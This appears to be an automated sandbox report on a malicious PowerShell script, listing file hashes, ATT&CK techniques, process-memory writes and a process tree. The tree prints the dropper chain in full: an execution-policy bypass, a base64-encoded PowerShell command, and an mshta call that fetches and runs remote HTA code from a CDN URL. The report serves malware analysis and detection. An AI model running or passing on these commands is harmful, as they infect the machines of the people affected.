8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8

Analysis

max time kernel
16s
max time network
16s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
26/08/2024, 01:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps1
Size

143B
MD5

3693d54bc3e0a508eefa28f951cc8e68
SHA1

963018c74563181fb8f60baa032ce8cc018cfd0d
SHA256

8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8
SHA512

2528cfdb72a0ba33a34d3ad2bb3632def1d42ff311c6aa723db2e45a5b020a815384b2cc6cfe3eae194916f642dc250b095ec6391f6af4f635b1289d71635f08

Score

10^/10

execution

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://requested-file.b-cdn.net/flare

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1744	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1744	powershell.exe
1796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 1796	1744	powershell.exe	30
PID 1744 wrote to memory of 1796	1744	powershell.exe	30
PID 1744 wrote to memory of 1796	1744	powershell.exe	30
PID 1796 wrote to memory of 2904	1796	powershell.exe	31
PID 1796 wrote to memory of 2904	1796	powershell.exe	31
PID 1796 wrote to memory of 2904	1796	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAHEAdQBlAHMAdABlAGQALQBmAGkAbABlAC4AYgAtAGMAZABuAC4AbgBlAHQALwBmAGwAYQByAGUAIgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://requested-file.b-cdn.net/flare
    3⤵
    - Modifies Internet Explorer settings
    PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f5848773204393fd3b5c0034a7a18ef2

SHA1
a25f8cae28f957df70ff10971d130f61e58469c1

SHA256
80ed47e0bc9af25a24921c6d714b163101fed68d0763825244c5b0ba30d9ed31

SHA512
229d2459e9395e8e3e997f5c658dc563ac929a3e429dbb0de38239687085a2c5fdf4143e6fdb0d50f357f44c5ad42e8d3ac16c7104bb5481dfdb26590971c591

Download Submit
memory/1744-4-0x000007FEF662E000-0x000007FEF662F000-memory.dmp

Filesize
4KB

Download
memory/1744-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download
memory/1744-6-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/1744-7-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1744-8-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1744-9-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1744-17-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1796-15-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1796-16-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download